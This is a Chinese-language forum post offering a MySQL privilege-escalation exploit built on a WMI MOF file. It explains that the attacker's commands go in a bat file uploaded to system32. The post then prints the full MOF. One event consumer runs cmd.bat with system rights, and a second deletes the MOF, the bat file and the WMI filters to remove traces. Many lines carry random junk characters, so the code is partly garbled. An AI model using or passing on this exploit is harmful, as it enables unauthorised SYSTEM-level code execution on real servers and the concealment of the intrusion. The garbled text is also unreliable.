Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
1 ]- ^: Z$ }; M5 o需要将要运行的命令写入到bat上传到system32目录，然后执行。

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
8 I1 \. ], h1 I2 A: @) b' A# k9 g( k
9 u3 s) M/ [. r1 _) m: O#pragma
                        namespace("\\\\.\\root\\cimv2")
                        class
2 F) e9 C( {: e; l/ u                        MyClass547
                        {           [key]
6 _/ q4 z! Q! Z8 ~$ `9 i                        string
                        Name;
( e( Y# f0 N; N6 k                        };
                        class
) L7 @, E9 x) [* A# Q. C* g; J                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
$ o) N. j& l" e  V& g                        string
: c: ~- }2 z& A                        Name;           [not_null]
0 G1 L" E8 F- r/ e9 i8 Z- @( M. h                        string
4 B7 n0 Q  C* {: k' i9 \: E* Y7 O                        ScriptingEngine;           string
8 F6 ~1 N  u4 w, J9 M& K                        ScriptFileName;           [template]
                        string
2 y/ z4 i/ N3 {1 D- ?                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
( u3 Z( v1 ], m& K- H                        =
                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
1 J; [% v9 G2 Q0 [                        PerUserInitialization
                        = TRUE;
+ E  K5 r; t9 p4 E0 K                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
                        =
                        {"ActiveScriptEventConsumer"};
3 f. u( X) M- p                        };
                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
                        =
                        "ASEC";         ScriptingEngine
# u5 n1 M3 u5 n6 F+ Y5 m" M+ e! ~                        =
                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
6 H& j+ ?3 g9 _% D! G& t                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
9 h4 d/ s: z# o- Q0 A( b/ W                        =
                        "qndASEC";         ScriptingEngine
                        =
; e' d/ t) ]1 M* `0 [. X  K                        "JScript";         ScriptText
" b# o3 [) ?4 a% e7 M1 A                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
                        }; instance of __EventFilter as $Filt {         Name
4 h2 W/ I4 i$ E% O                        =
1 T( A! j$ [7 B, D9 V& f# R- b6 h                        "instfilt";         Query
                        =
                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
0 y+ i- i3 p. }* G/ c9 P0 g                        =
# ?" s( N0 j, F/ E1 K5 _                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
8 {# s" z, a7 r. Z% e6 p, j( \                        =
                        "qndfilt";         Query
0 \4 d- e3 p: P0 f2 }% B                        =
+ h' E+ i# Z; ^( @6 [                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
( V5 k/ \( e9 ^) v                        = $cons;         Filter
                        = $Filt;
- H& ]' R$ S2 s                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
/ |1 h2 |* ~$ B                        = $cons2;         Filter
- E1 w' }: x" r/ O                        = $Filt2;
                        }; instance of MyClass547
" q* H; m+ j; C% Y  V8 @                        as $MyClass {         Name
' K# f( G( b  N* w7 n: `                        =
                        "ClassConsumer";
  i8 E9 C& P% C$ o6 V                        };